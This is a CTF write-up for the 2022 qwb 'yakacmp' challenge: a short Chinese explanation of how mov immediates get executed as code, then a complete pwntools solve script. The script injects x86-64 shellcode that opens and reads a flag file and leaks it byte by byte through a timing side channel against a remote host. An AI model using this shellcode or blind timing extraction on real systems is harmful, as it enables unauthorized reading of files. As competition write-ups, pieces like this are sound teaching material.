
qwb2022_yakacmp

当mov的次数超过10时,会生成push immediate的指令,由于push指令在cpu解析执行时,最多为4字节,于是会导致immediate立即数中后4字节成为指令。

因此,我们可以将需要的一些指令放入立即数中,比如syscall,通过构造read继续输入数据,并将数据存放于当前片段的后方。我们可以将后续的shellcode从这个read中输入。
禁用了write,因此只能进行flag的盲注

#coding:utf8
# Solve script for the qwb2022 "yakacmp" challenge (Python 2: it uses the
# `print` statement).  Indentation was lost in the page paste and has been
# reconstructed below — TODO confirm the block structure against the original
# script (in particular whether `sh.recvuntil('over')` sits inside or after the
# 14-iteration loop).
#
# What this file shows about the method: for each flag position `index` and
# each candidate byte, a fresh connection is opened, a small program is
# submitted, and the elapsed time until the connection goes quiet decides
# whether the candidate matched.  A match makes the remote side stall (see the
# `compare` loop in the shellcode), so the delay itself is the information
# channel — no output from the target is required, which is why the write-up
# above calls this a blind extraction.
from pwn import *

context(os='linux',arch='amd64')
import time

#context(os='linux',arch='amd64',log_level = 'critical')
# Characters that may appear in the flag.
possible_char = []
# The order matters for efficiency: put the most frequent characters first.
# '\x00' is tried last and doubles as the "end of flag" marker (see below).
for x in range(0,10):
    possible_char.append(str(x))
for x in range(ord('a'),ord('z')+1):
    possible_char.append(chr(x))
possible_char.append('{')
possible_char.append('-')
possible_char.append('_')
possible_char.append('}')
possible_char.append('\x00')

OK = False      # set once the flag is complete or a round matches nothing
flag = ''       # bytes recovered so far
index = 0       # flag position currently being guessed

while not OK:
    print 'guess (',index,') char'
    length = len(flag)  # compared after the round to detect "nothing matched"
    for guess_char in possible_char:
        # One fresh connection per candidate; the timing below is per connection.
        #sh = process('./yakacmp')
        sh = remote('47.93.52.218',20848)

        # First stage, fed to the challenge's own instruction interpreter: ten
        # filler `mov`s followed by immediates whose byte layout is meant to be
        # executed as x86-64 code (the write-up above explains why part of an
        # immediate ends up being executed).
        code = ('mov r2,%d\n' % (0x6666666666666666))*10
        code += 'mov r2,%d\n' % 0x58ff314800000000
        code += 'mov r2,%d\n' % 0x53d2314800000000
        code += 'mov r2,%d\n' % 0x53ffb25e233300a9
        #syscall
        code += 'mov r1,%d\n' % (0x050F905b66666666)
        sh.sendlineafter('now',code)

        # 14 == 10 + 3 + 1 `mov` lines above; presumably one prompt per
        # instruction — TODO confirm against the binary's output.
        for i in range(14):
            sh.recvuntil('more operation?')
            #raw_input()
            sh.sendline('NO')
        sh.recvuntil('over')

        # Second stage, delivered over the read set up by the first stage.
        # Two syscalls (rax=2 then rax=0 on amd64: open, then read onto the
        # stack), after which the `compare` label spins forever while the byte
        # at [rsp+index] equals the guessed byte (`jz` back to itself) and
        # returns immediately otherwise.  That stall is what gets timed below.
        shellcode = asm('''
mov rax,0x2
mov rdi,0x67616c662f2e
push rdi
lea rdi,[rsp]
mov rsi,0
syscall
mov rdi,rax
lea rsi,[rsp]
mov rdx,0x50
xor rax,rax
syscall
compare:
cmp byte ptr[rsp+%d],%d
jz compare
ret
''' % (index,ord(guess_char)))
        sleep(1)
        #raw_input()
        sh.sendline(shellcode)
        #sleep(1)
        # The purpose of this padding is not evident from the script alone.
        sh.sendline('a'*0x6000)
        #sh.interactive()

        # Timing oracle: recvall() returns when the peer closes the connection
        # or after the 6 s timeout, so a stalled target runs close to 6 s.
        start = time.time()
        sh.recvall(timeout = 6)
        end = time.time()
        #raw_input()
        #sh.interactive()
        sh.close()
        # Decision threshold: adjust according to network latency.
        if end - start > 3:
            if guess_char == '\x00':
                # NUL terminator reached: the flag is complete.
                OK = True
            flag += guess_char
            print 'success guess char at(',index,')'
            index+=1
            break
    print 'flag=',flag
    if length == len(flag):
        # No candidate matched at this position; stop instead of looping forever.
        OK = True

# NOTE(review): `sh` was closed inside the loop, so this operates on a closed
# tube; presumably a leftover from interactive debugging.
sh.interactive()